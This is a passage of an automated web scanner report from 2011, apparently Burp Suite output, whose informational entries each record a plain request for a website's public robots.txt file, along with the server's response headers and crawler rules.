24.350. http://www.gamesgames.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamesgames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamesgames.com

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:53:03 GMT
Connection: close
Content-Length: 25

User-agent: *
Allow: /

24.351. http://www.gamespot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamespot.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamespot.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:01 GMT
Server: Apache
Last-Modified: Mon, 25 Oct 2010 22:21:35 GMT
ETag: "41125-49-493786a4359c0"
Accept-Ranges: bytes
Content-Length: 73
Keep-Alive: timeout=300, max=885
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: Slurp
Disallow: /pages/tags/
Disallow: /tags/
Crawl-delay: 2

24.352. http://www.gamesradar.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamesradar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamesradar.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:56 GMT
Server: Apache/2.2.11 (Ubuntu) mod_jk/1.2.26
Last-Modified: Tue, 04 May 2010 19:20:08 GMT
ETag: "2bc0005-e5-485c998f5aa00"
Accept-Ranges: bytes
Content-Length: 229
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /profile-edit/
Disallow: /administration/
Disallow: /radarnation/update-account
Disallow: /vid-config
Disallow: /vid-playlist

# Sitemap files
Sitemap: http://www.games
...[SNIP]...

24.353. http://www.gamestop.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamestop.com

Response

HTTP/1.0 200 OK
Content-Length: 117
Content-Type: text/plain
Content-Location: http://www.gamestop.com/robots.txt
Last-Modified: Wed, 27 Oct 2010 13:41:23 GMT
Accept-Ranges: bytes
ETag: "73f6e8a4dc75cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:33:19 GMT
Connection: close

User-agent: *
Allow: /
Disallow: /Profiles
Disallow: /Orders
Sitemap: http://www.gamestop.com/sitemap-index.xml

24.354. http://www.gametrailers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gametrailers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gametrailers.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:37:31 GMT
Content-Length: 137
Connection: close
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:37:31 GMT; path=/
Vary: User-Agent

User-agent: *
Sitemap: http://www.gametrailers.com/sitemap.xml

User-Agent: msnbot-media
Disallow:

User-Agent: msnbot
Disallow:

24.355. http://www.gamevance.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamevance.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamevance.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:26 GMT
Server: Apache
Last-Modified: Fri, 23 Jul 2010 08:32:56 GMT
ETag: "3802de-19-48c09e1b25e00"
Accept-Ranges: bytes
Content-Length: 25
Cache-Control: max-age=18000
Expires: Sat, 02 Apr 2011 18:53:26 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /

24.356. http://www.gamewinners.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamewinners.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamewinners.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:37:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 May 2010 21:14:15 GMT
ETag: "4be8088-4ca-133b37c0"
Accept-Ranges: bytes
Content-Length: 1226
Content-Type: text/plain; charset=UTF-8
Age: 499
X-Cache: HIT from www.gamewinners.com
X-Cache-Lookup: HIT from www.gamewinners.com:80
Via: 1.0 www.gamewinners.com:80 (squid/2.6.STABLE16)
Connection: close

# robots.txt for www.gamewinners.com
# Administrative contact available at http://www.gamewinners.com/email.htm
User-agent: Mediapartners-Google*
Disallow: /print.php
Disallow: /from.php
Disallow:
...[SNIP]...

24.357. http://www.gap.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gap.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gap.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "e5edaf21c7f99e700dbda2a7d5edeacd:1275492491"
Last-Modified: Wed, 02 Jun 2010 15:27:13 GMT
Accept-Ranges: bytes
Content-Length: 5548
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:31:28 GMT
Connection: close

# Updated 2010-06-02


# For all bots
User-agent: *
Allow: /profile/account_summary.do
Disallow: /browse/search.do
Disallow: /buy/
Disallow: /cookieFailure.do
Disallow: /image/
Disallow: /p
...[SNIP]...

24.358. http://www.gateway.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gateway.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gateway.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:06 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_ssl/2.8.31 OpenSSL/0.9.8j
Vary: *
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:41:06 GMT
Last-Modified: Wed, 30 Apr 2008 16:54:46 GMT
ETag: "c4-4818a456"
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /dw/
Disallow: /popup
Disallow: /work
Disallow: /government
Disallow: /education
Disallow: /gsa
Disallow: /corporation
Disallow: /smallbusiness

24.359. http://www.gather.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gather.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gather.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:05 GMT
Server: Apache/2.2.3 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=EB36F55F45F2F7E6EBB8DA4180AA02C4; Domain=.gather.com; Path=/
Set-Cookie: vis=dxZcxPp5M50JLNy2639QG+AFqnYHparuLmhmYPtVGPPAs2jVOwihu4RJrClz12ATFATbqqOtA/iDUwytrzfx6RFSOnB/nbulf4sjRtkwWmY=; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:33:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=Px4x67b/+RcuOBs80O9yZZAxITQ4ew8vww1nJwpoI+iaqKtMLWlgM+VhhbgWrVzOKz0WuOXt5Kk8UmHpLI4bO/TFGZjT+D0HUnvNbiUtBb0r8B+Jqfu/jx7vXE7s/eDN; Domain=gather.com; Expires=Fri, 28-Mar-2031 13:33:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 4696
Keep-Alive: timeout=5, max=100
Connection: close
Content-Type: text/plain;charset=UTF-8

# robots.txt for gather.com


User-agent: Twiceler
Crawl-delay: 0.5

User-agent: Slurp
Crawl-delay: 3

User-agent: Speedy
Crawl-delay: 5

User-agent: *
Disallow: /viewMemberFeed.action
Di
...[SNIP]...

24.360. http://www.geico.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.geico.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.geico.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/plain; charset=ISO-8859-1
Expires: Sat, 02 Apr 2011 13:35:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:35:16 GMT
Content-Length: 574
Connection: close
Set-Cookie: SaneID=30196B1937FB6D94; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.geico.com

User-agent: *
Sitemap: http://www.geico.com/sitemap
Disallow: /404/
Disallow: /akm/
Disallow: /applications/
Disallow: /email/
Disallow: /images/
Disallow: /includes/
Disallow: /landingpage/
Disallow:
...[SNIP]...

24.361. http://www.gemoney.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gemoney.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gemoney.com

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 14:58:28 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 06 May 2010 15:30:13 GMT
ETag: "5947-2d6-9e656b40"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 726
Connection: close
Age: 82921

User-agent: *
Disallow: /en/business/Markets/general_GAT_landing_page.html
Disallow: /en/business/Markets/Automotive/automotive_GAT_landing_page.html
Disallow: /en/business/Markets/Furnishings/fu
...[SNIP]...

24.362. http://www.genealogy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genealogy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.genealogy.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:40 GMT
Server: Apache
Set-Cookie: SessionID=990a52058afc1bff4d973004; path=/; domain=.genealogy.com; expires=Friday, 31-Dec-2010 23:59:59 GMT
Set-Cookie: GComStoreData=%0ASIT%3D000b5b058afd63ff4d973004; domain=.genealogy.com; path=/;
X-ServerName: SN:gweb09:
Last-Modified: Fri, 12 Mar 2010 20:43:23 GMT
ETag: "28dfd3-c9-4b9aa76b"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerwww.genealogy.com=152676544.20480.0000; path=/

# robots.txt for http://www.genealogy.com/
#

User-agent: *
Disallow: /cgi-bin # keep robots out of the executable tree
Disallow: /users/f/r/e/Robert-L-Frey-jr

User-agent: WebReaper
Disallow: /
...[SNIP]...

24.363. http://www.gf2ube.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gf2ube.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gf2ube.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:44 GMT
Server: Apache
Last-Modified: Sun, 27 Dec 2009 19:40:45 GMT
ETag: "2c8a453-23-47bbaf700c940"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

24.364. http://www.gifts.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gifts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gifts.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:31 GMT
Server: Apache
Last-Modified: Fri, 11 Feb 2011 18:42:52 GMT
ETag: "be4-22f-49c0610c62300"
Accept-Ranges: bytes
Content-Length: 559
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
Set-Cookie: SERVERID=web08; path=/
Cache-control: private

User-agent: *
Disallow: /search/offer_click/
Disallow: /search/core_offer_click/
Disallow: /search/api_offer_click/
Disallow: /search/sponsored_click/
Disallow: /search/wedding_channel_click/
Disallow
...[SNIP]...

24.365. http://www.godaddy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 02 Apr 2011 12:39:00 GMT
Connection: close
Content-Length: 718

#
# robots.txt
#
User-agent: Googlebot
Disallow: /about/godaddy-chinese.aspx
Disallow: /app
Disallow: /imag
Disallow: /out
Disallow: /gdshop/app
Disallow: /gdshop/clo
Disallow: /gdshop/con
Disallow: /
...[SNIP]...

24.366. http://www.gofreecredit.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gofreecredit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gofreecredit.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:35:24 GMT
Content-Type: text/plain
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=dkloptvcv2aemsa1ndk9igim35; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: uid=ChViBk2XJhyPAz5VA1taAg==; expires=Sun, 01-Apr-12 13:35:24 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: uid=0CuC3E2XJhxzVSLlA2AiAg==; expires=Sun, 01-Apr-12 13:35:24 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

User-agent: *
Disallow:

24.367. http://www.goodreads.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goodreads.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goodreads.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sat, 02 Apr 2011 13:41:29 GMT
Content-Type: text/plain
Content-Length: 310
Last-Modified: Thu, 31 Mar 2011 23:27:02 GMT
Connection: close
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
User-agent: *

Disallow: /admin
Disallow: /home/index_rss
Disallow: /review/list_rss
Disallow: /user
...[SNIP]...

24.368. http://www.google-analytics.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Sat, 02 Apr 2011 12:44:12 GMT
Expires: Sat, 02 Apr 2011 12:44:12 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

24.369. http://www.google.ca/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.ca

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sat, 02 Apr 2011 13:39:31 GMT
Expires: Sat, 02 Apr 2011 13:39:31 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

24.370. http://www.google.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.co.uk

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sat, 02 Apr 2011 13:57:12 GMT
Expires: Sat, 02 Apr 2011 13:57:12 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

24.371. http://www.googleadservices.com/pagead/conversion/1012592563/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1012592563/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Sat, 02 Apr 2011 13:57:08 GMT
Expires: Sat, 02 Apr 2011 13:57:08 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

24.372. http://www.gossipcenter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gossipcenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gossipcenter.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (CentOS)
Last-Modified: Thu, 13 Jan 2011 22:00:03 GMT
Cache-Control: max-age=1209600
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 1628
X-Cacheable: YES
Date: Sat, 02 Apr 2011 13:25:26 GMT
X-Varnish: 2537452138 2537125055
Age: 239
Via: 1.1 varnish
Connection: close
X-Cache: HIT
X-Cache-Hits: 1

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

24.373. http://www.gourmandia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gourmandia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gourmandia.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:42 GMT
Server: Apache
Last-Modified: Mon, 03 Aug 2009 04:18:03 GMT
ETag: "668a51e-98f-e56f4c0"
Accept-Ranges: bytes
Content-Length: 2447
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /gotopage.php?page=52
Disallow: /gotopage.php?page=51
Disallow: /gotopage.php?page=50
Disallow: /gotopage.php?page=26
Disallow: /gotopage.php?page=59
Disallow: /gotopage.php?pa
...[SNIP]...

24.374. http://www.gravity.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gravity.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gravity.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:12 GMT
Server: Apache
Last-Modified: Wed, 23 Feb 2011 23:32:00 GMT
ETag: "17c476-24-49cfb80e41c00"
Accept-Ranges: bytes
Content-Length: 36
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

24.375. http://www.greatschools.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greatschools.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greatschools.org

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) mod_perl/1.31 mod_ssl/2.8.31 OpenSSL/0.9.8e mod_jk/1.2.28
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/plain;charset=UTF-8
Date: Sat, 02 Apr 2011 13:43:49 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Language: en
Connection: close
Set-Cookie: TRACKING_NUMBER=1301751829; Domain=.greatschools.org; Path=/
Set-Cookie: COBRAND=www.greatschools.org; Domain=.greatschools.org; Path=/
Set-Cookie: COBRAND_TYPE=standard-adsgs; Domain=.greatschools.org; Path=/
Set-Cookie: JSESSIONID=C7526920DA8C4EA24141324EE95CF6FE; Path=/


User-agent: Googlebot
Disallow: /*&amp;*
Disallow: /*/popup
Disallow: /*/print
Disallow: /*;jsessionid*
Disallow: /access/
Disallow: /ads/
Disallow: /cgi-bin/$LCSTATE
Disallow: /cgi-bin/addcomments
D
...[SNIP]...

24.376. http://www.greenwichmeantime.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenwichmeantime.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greenwichmeantime.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:32 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Tue, 30 Jan 2007 21:59:47 GMT
ETag: "c8c037-1a8-1e204e80"
Accept-Ranges: bytes
Content-Length: 424
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /network/
Disallow: /manual/
Disallow: /imanager/
Disallow: /rss/
Disallow: /time/
Disallow: /time-zone/europe/uk/england/london/serviced-offices/avanta/

User-agent: M
...[SNIP]...

24.377. http://www.groupon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/plain
Accept-Ranges: bytes
Age: 162369
Date: Sat, 02 Apr 2011 13:32:32 GMT
Last-Modified: Fri, 11 Mar 2011 17:55:00 GMT
Content-Length: 442
Connection: close

sitemap: http://www.groupon.com/sitemap.xml
User-agent: *
Disallow: /deals/update_deal_status
Disallow: /*/community
Disallow: /deals/*/confirmation
Disallow: /deals/*/memberships
Disallow: /users/*
D
...[SNIP]...

24.378. http://www.guardian.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:59 GMT
Server: Apache
Set-Cookie: GU_MU=VFpjbFR3cjZERGtBQUhTdW9sOEFBQUNPfGRaNzZ1RFRXMTVpYTM5K0FaUXNZOXc9PQ==; path=/; domain=.guardian.co.uk; expires=Tue, 30-Mar-2021 13:31:59 GMT
Last-Modified: Fri, 03 Dec 2010 16:33:45 GMT
Accept-Ranges: bytes
Content-Length: 1725
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 02
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

##ACAP version=1.0

# Conventional policies...
User-agent: *
Disallow: /sendarticle/
Disallow: /Users/
Disallow: /users/
Disallow: /*/print$
Disallow: /email/
Disallow: /contactus/
Disallow: /share/
D
...[SNIP]...

24.379. http://www.guitarcenter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guitarcenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guitarcenter.com

Response

HTTP/1.1 200 OK
Content-Length: 478
Content-Type: text/plain
Last-Modified: Fri, 10 Sep 2010 18:25:24 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
SN: 88
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:14:52 GMT
Connection: close

User-agent: *

Disallow: /Ajax/
Disallow: /CS/
Disallow: /Includes/CustomDirectGuitars/
Disallow: /Includes/Interstate/
Disallow: /Includes/MIRetail/
Disallow: /Includes/MyMusicStore/
Disallow
...[SNIP]...

24.380. http://www.hallmark.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hallmark.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hallmark.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 25 Mar 2011 07:08:26 GMT
Accept-Ranges: bytes
ETag: "683de76fbbeacb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
WEBHOST: CW127
Content-Length: 170
Cache-Control: no-cache
Date: Sat, 02 Apr 2011 14:14:54 GMT
Connection: close

User-agent: *
Disallow: /iwov-resources
Disallow: /Home/Error?aspxerrorpath=
Disallow: /UserLogon
Disallow: /Reminders

Sitemap: http://www.hallmark.com/sitemap.xml

24.381. http://www.hayneedle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hayneedle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hayneedle.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:26 GMT
Server: Apache
Set-Cookie: SITE_ID=669;domain=.hayneedle.com;path=/
Set-Cookie: GLOBALBRANDTABDISPLAYFLAG=1;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:26 GMT;path=/
Set-Cookie: CFID=1845784;expires=Mon, 25-Mar-2041 14:13:26 GMT;path=/
Set-Cookie: CFTOKEN=57735913;expires=Mon, 25-Mar-2041 14:13:26 GMT;path=/
Set-Cookie: SID=168FB1A4%2DCF69%2D72EF%2DF4C9356A2CCC8022;domain=.hayneedle.com;path=/
Set-Cookie: BRAND_SID=168FB1B2%2DF93E%2DE0F7%2D814A5C26BCA7B42A;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_SID=168FB1C0%2DA207%2DCA5A%2D687007A141DCBCB7;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:26 GMT;path=/
Set-Cookie: SITE_ID=669;path=/
Set-Cookie: SESSION_COUNTER=0;path=/
Set-Cookie: SIGNATURE=aL7Xj58q%2BfkKz9KGs%2BUbhLYwVO3pPWlTYAv362eycFXuRIg9Wxfh4TcWnCpUwT9K;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_CUSTOMER_ACCOUNT=%3CwddxPacket%20version%3D%271%2E0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct%3E%3Cvar%20name%3D%27CUSTOMER%5FID%27%3E%3Cstring%3E0%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27CUSTOMER%5FFIRST%5FNAME%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27SIGNED%5FIN%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E;domain=.hayneedle.com;path=/
Set-Cookie: SKU_COMPARE=;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:26 GMT;path=/
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 14:18:26 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /account/
Disallow: /checkout/
Disallow: /info/
Disallow: /qas/
Disallow: /search/
Disallow: /css/
Disallow: /js/
Disallow: /backyard/
Disallow: /nursery/
Disallow:
...[SNIP]...

24.382. http://www.hbo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hbo.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:15:40 GMT
Server: Apache
Last-Modified: Mon, 13 Sep 2010 19:43:57 GMT
ETag: "6b4-db-49029512ff940"
Accept-Ranges: bytes
Content-Length: 219
Cache-Control: max-age=60
Expires: Sat, 02 Apr 2011 14:16:40 GMT
Vary: Accept-Encoding
g: u
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /data/content/
Disallow: /utils/
